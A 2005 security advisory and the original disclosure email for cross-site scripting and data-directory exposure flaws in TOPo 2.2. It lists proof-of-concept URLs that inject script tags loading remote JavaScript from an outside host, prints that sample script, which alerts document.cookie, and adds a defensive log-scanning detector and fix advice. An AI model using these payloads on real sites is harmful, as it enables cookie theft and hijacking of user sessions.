TOPo Input Validation Holes in 'index.php' Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1014016
SecurityTracker URL: http://securitytracker.com/id/1014016
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 20 2005
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 2.2.178
Description:
Lostmon reported several vulnerabilities in TOPo. A remote user can conduct cross-site scripting attacks. A remote user can also obtain certain application data.
The 'index.php' script does not properly validate user-supplied input in several parameters to filter HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the TOPo software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
The 'm', 's', 'ID', and 't' parameters are affected. Other parameters may also be affected.
Some demonstration exploit URLs are provided:
http://[target]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498
http://[target]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar
http://[target]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar
http://[target]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://[target]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>
http://[target]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>
http://[target]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>
When adding a new comment, several fields are not properly validated, including the name, web address, and e-mail address fields.
A remote user can access TOPo information by requesting files in the 'data' directory. A demonstration exploit URL is provided:
http://[target]/data/
The vendor was notified on May 19, 2005.
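The validation the advisory says 'index.php' lacks, turned into log-side detection as an added example (not TOPo's code): it parses constructed access-log lines, percent-decodes the 'm', 's', 'ID' and 't' parameters and flags any that carry HTML metacharacters, and separately flags reads under the 'data' directory. The client addresses, timestamps and the js.example host in the sample lines are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines modelled on the advisory's proof-of-concept
# URLs; the client addresses and the js.example host are placeholders.
LOG_LINES = [
    '198.51.100.7 - - [20/May/2005:05:22:19 +0200] "GET /topo/index.php?m=top&s=info&ID=1115946293.3552&t=puntuar HTTP/1.1" 200 4112',
    '198.51.100.9 - - [20/May/2005:05:23:01 +0200] "GET /topo/index.php?m=top%22%3E%3Cscript%20src=http://js.example/x.js%3E%3C/script%3E&s=info&ID=1114815037.2498 HTTP/1.1" 200 4290',
    '198.51.100.9 - - [20/May/2005:05:23:40 +0200] "GET /topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498<script>alert()</script> HTTP/1.1" 200 4301',
    '198.51.100.9 - - [20/May/2005:05:24:05 +0200] "GET /data/ HTTP/1.1" 200 1337',
    '198.51.100.9 - - [20/May/2005:05:24:20 +0200] "GET /data/1114815037.2498.dat HTTP/1.1" 200 882',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameters the advisory names as reflected by index.php without HTML filtering.
WATCHED_PARAMS = {"m", "s", "ID", "t"}
# None of these characters has a legitimate use in those parameters; their
# presence after percent-decoding means a tag or attribute break-out.
HTML_META = re.compile(r'[<>"\']')


def classify(line):
    """Return ("xss", [params]) for an index.php request carrying HTML
    metacharacters in a watched parameter, ("data-dir", path) for any
    request under the data directory, or None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    path, _, query = match.group("target").partition("?")
    if path.startswith("/data/"):
        return ("data-dir", path)
    if path.endswith("/index.php"):
        # parse_qsl percent-decodes, so %3C and a literal '<' are treated alike.
        bad = sorted({name for name, value in parse_qsl(query, keep_blank_values=True)
                      if name in WATCHED_PARAMS and HTML_META.search(value)})
        if bad:
            return ("xss", bad)
    return None


def scan(lines):
    """Return (line_index, kind, detail) for every suspicious line."""
    findings = []
    for index, line in enumerate(lines):
        result = classify(line)
        if result:
            findings.append((index,) + result)
    return findings
```

On the application side the matching fix is to pass every reflected parameter through htmlspecialchars() before output and to disable directory listing for the data directory (for example Options -Indexes in Apache).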
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the TOPo software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A remote user can obtain application data from the 'data' directory.
Solution:
No solution was available at the time of this entry.
Vendor URL: ej3soft.ej3.net/index.php?m=info&s=topo&t=info
Cause:
Access control error, Input validation error
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
Message History:
None.
Source Message Contents
Date: Fri, 20 May 2005 05:22:19 +0200
Subject: TOPo 2.2 multiple variable & fields XSS and information disclosure
#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisory: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
vendor notified: yes. exploit available: yes.
#######################################################
TOPo is a free TOP system written in PHP that works
without a MySQL database. TOPo is specially designed for
web sites hosted on web servers that do not offer
quality MySQL support.
TOPo contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application
does not validate the 'm', 's', 'ID', 't' and possibly other parameters
upon submission to the 'index.php' script. This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.
TOPo also contains a flaw that allows remote users to disclose information.
All data is stored in the '/data/' folder, and the *.dat files store all votes,
comments and other information about the sites on the top. Any user can download
these files and obtain the IP addresses of all clients (all clients who voted
or added a comment).
################
software used:
###############
Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 (detects all XSS attacks in this case :D)
Google toolbar 2.0.114.9-big/es
###########
versions:
###########
TOPo v2.2.178 vulnerable.
##############
solution
##############
no solution was available at this time.
############
time line
############
discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005
######################
Proof of concepts XSS
######################
http://[victim]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498
http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar
http://[victim]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>
http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>
http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>
#########################
When trying to add a new comment, some fields are vulnerable to XSS-style attacks.
http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552
The name field, the 'Your web' field and the 'your email' field
are vulnerable.
##################
example of js.js
##################
Thnx to http://www.drorshalev.com for this script and for hosting it
for this demonstration.
#################
js.js
#################
function showIt(){
  document.body.innerHTML = "<a href='javascript:alert(document.cookie)'><center><b>Your PC Can be hacked Via "
    + document.domain + " XSS ,Html Injection to a Web Site " + document.domain
    + " By DrorShalev.com<br></b><br><img border=0 src='http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60>"
    + "<img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp' border=1><br></center></a>"
    + document.body.innerHTML;
  window.status = "Your PC Can be hacked Via " + document.domain
    + " XSS ,Html Injection to a Web Site " + document.domain + " By DrorShalev.com";
  setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')", 6000);
}
setTimeout("showIt()", 2000);
################
data disclosure
################
http://[victim]/data/
################ EnD #####################
thnx to estrella for being my light
thnx to all http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and dror for his script and for
hosting it !!!!
thnx to all who day after day support me !!!
--
sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move....